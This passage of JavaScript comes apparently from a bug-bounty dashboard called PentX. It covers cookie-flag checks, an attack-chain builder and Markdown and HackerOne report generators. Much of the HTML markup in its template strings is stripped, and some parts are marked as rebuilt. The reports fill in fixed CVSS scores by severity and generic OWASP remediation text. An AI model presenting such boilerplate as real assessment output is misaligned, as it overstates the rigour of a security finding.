  if(!flags.httponly) issues.push({sev:'high',msg:'Missing HttpOnly flag — accessible via document.cookie (XSS risk)'});
  if(!flags.samesite) issues.push({sev:'medium',msg:'Missing SameSite flag — CSRF risk'});
  if(sameSiteVal === 'none' && !flags.secure) issues.push({sev:'critical',msg:'SameSite=None without Secure — rejected by modern browsers'});
  const ok = [];
  if(flags.secure) ok.push('Secure ✓');
  if(flags.httponly) ok.push('HttpOnly ✓');
  if(flags.samesite) ok.push('SameSite='+flags.samesite[1]+' ✓');
  out.innerHTML = `
${ok.length?`
${ok.join(' ')}
`:''} ${issues.map(i=>`
${i.sev} ${i.msg}
`).join('')} ${!issues.length?'
✓ Cookie security flags look good.
':''}
`; }
// ===== ATTACK CHAINS =====
// separator shown between consecutive steps; the original markup was lost in extraction, a plain arrow is assumed here
const chainStepSep = '↓';
function renderChains() {
  const list = document.getElementById('chains-list');
  // built-in chains are hard-coded; custom chains are user input, so their title and steps are escaped before innerHTML
  list.innerHTML = [...state.attackChains, ...state.customChains].map((c,i)=>`
${escHtml(c.title)}
${c.severity}
${c.desc}
${c.steps.map((s,j)=>`
STEP ${j+1}
${escHtml(s)}
${j < c.steps.length - 1 ? chainStepSep : ''}
`).join('')}
💰 Estimated Combined Bounty: ${c.bounty}
`).join('');
}
let chainStepCount = 1;
function addChainStep() {
  chainStepCount++;
  const builder = document.getElementById('chain-steps-builder');
  const div = document.createElement('div');
  div.className = 'input-group';
  // the input markup was lost in extraction; rebuilt from the .chain-step-input selector that buildChain() queries
  const inp = document.createElement('input');
  inp.type = 'text';
  inp.className = 'chain-step-input';
  inp.placeholder = 'Step ' + chainStepCount;
  div.appendChild(inp);
  builder.appendChild(div);
}
function buildChain() {
  const name = document.getElementById('chain-name').value.trim();
  const steps = [...document.querySelectorAll('.chain-step-input')].map(i=>i.value.trim()).filter(Boolean);
  if(!name||steps.length<2){ alert('Enter a name and at least 2 steps.'); return; }
  state.customChains.push({title:name,severity:'high',bounty:'Custom',steps,desc:'Custom attack chain built with PentX.'});
  renderChains();
  document.getElementById('chain-name').value='';
  document.querySelectorAll('.chain-step-input').forEach((el,i)=>{ if(i>0) el.parentElement.remove(); else el.value=''; });
  chainStepCount=1;
  document.getElementById('custom-chain-output').innerHTML = `
✓ Chain added successfully.
`; }
// ===== REPORT =====
function updateReportCVSS(findings) { const cvss = document.getElementById('cvss-summary'); if(!findings.length){ cvss.innerHTML='
No findings to score.
'; return; } const scores = {critical:9.0,high:7.5,medium:5.0,low:3.0,info:0.5}; cvss.innerHTML = findings.filter(Boolean).map(f=>`
${f.title.slice(0,20)}...
${scores[f.sev]||0}
`).join(''); }
function generateReport() {
  const title = document.getElementById('rpt-title').value || 'Security Assessment Report';
  const org = document.getElementById('rpt-org').value || 'Target Organization';
  const researcher = document.getElementById('rpt-researcher').value || 'Anonymous Researcher';
  const fmt = document.getElementById('rpt-format').value;
  const date = new Date().toISOString().split('T')[0];
  const findings = state.findings.filter(Boolean);
  const critical = findings.filter(f=>f.sev==='critical');
  const high = findings.filter(f=>f.sev==='high');
  const medium = findings.filter(f=>f.sev==='medium');
  const low = findings.filter(f=>f.sev==='low'||f.sev==='info');
  const cvssMap = {critical:9.1,high:7.5,medium:5.3,low:3.1,info:0.5};
  let report = `# ${title}

**Organization:** ${org}
**Researcher:** ${researcher}
**Date:** ${date}
**Platform:** ${fmt}
**Tool:** PentX v1.0 — VaultOcean

---

## Executive Summary

This security assessment identified **${findings.length} vulnerabilities** across scanned targets.

| Severity | Count |
|----------|-------|
| 🔴 Critical | ${critical.length} |
| 🟠 High | ${high.length} |
| 🟡 Medium | ${medium.length} |
| 🔵 Low/Info | ${low.length} |
| **Total** | **${findings.length}** |

${critical.length > 0 ? `⚠️ **CRITICAL RISK**: ${critical.length} critical severity findings require immediate attention.` : ''}

---

## Detailed Findings

`;
  findings.forEach((f,i) => {
    report += `### Finding ${i+1}: ${f.title}

**Severity:** ${f.sev.toUpperCase()}
**CVSS Score:** ${cvssMap[f.sev]||0}
**Confidence:** ${f.confidence}%
**Bounty Estimate:** ${f.bounty}
**Module:** ${f.module}

**Description:**
${f.desc}

**Verification Steps:**
${f.verify}

**Remediation:**
Implement industry standard security controls for ${f.title.toLowerCase()}. Consult OWASP guidelines for detailed remediation steps.

---

`;
  });
  report += `## Remediation Priority

1. Fix all CRITICAL findings immediately
2. Address HIGH findings within 7 days
3. Schedule MEDIUM fixes in next sprint
4. Log LOW/INFO for future review

---

*Generated by PentX v1.0 — VaultOcean Recon Platform*
*Report Date: ${date}*
`;
  document.getElementById('report-preview').textContent = report;
  window._reportContent = report;
}
function downloadReport() {
  if(!window._reportContent){ generateReport(); }
  const blob = new Blob([window._reportContent], {type:'text/markdown'});
  const a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'pentx-report-' + new Date().toISOString().split('T')[0] + '.md';
  a.click();
}
function copyReport() {
  if(!window._reportContent){ generateReport(); }
  navigator.clipboard.writeText(window._reportContent).then(()=>alert('Report copied to clipboard!'));
}
function copyHackerOne() {
  const findings = state.findings.filter(Boolean);
  if(!findings.length){ alert('No findings to export. Run a scan first.'); return; }
  const f = findings[0];
  const h1 = `**Vulnerability:** ${f.title}
**Severity:** ${f.sev.toUpperCase()}

**Description:**
${f.desc}

**Steps to Reproduce:**
${f.verify}

**Impact:**
${f.desc}

**Recommended Fix:**
Implement standard security controls for this vulnerability type per OWASP guidelines.

**Supporting Materials:**
[Attach screenshots from Burp Suite / browser DevTools]`;
  navigator.clipboard.writeText(h1).then(()=>alert('HackerOne template copied!'));
}
// ===== HELPERS =====
function ri(a,b){ return Math.floor(Math.random()*(b-a+1))+a; }
function getExpiry(d){ return d; }
// Escape the characters that can open markup; '&' is replaced first so the later entities are not double-escaped.
function escHtml(s){ return String(s).replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;'); }
// ===== INIT =====
renderModules(); renderOWASP(); renderChains(); renderIDORChecklist();
// Animate stats on load
setTimeout(()=>{ const el = document.getElementById('stat-scans'); if(el) el.style.transition='all 0.5s'; },100);
// Clock tick
setInterval(()=>{ const dot = document.querySelector('.status-dot'); if(dot){ dot.style.opacity = (parseFloat(dot.style.opacity)||1) > 0.5 ? '0.5' : '1'; } }, 1000);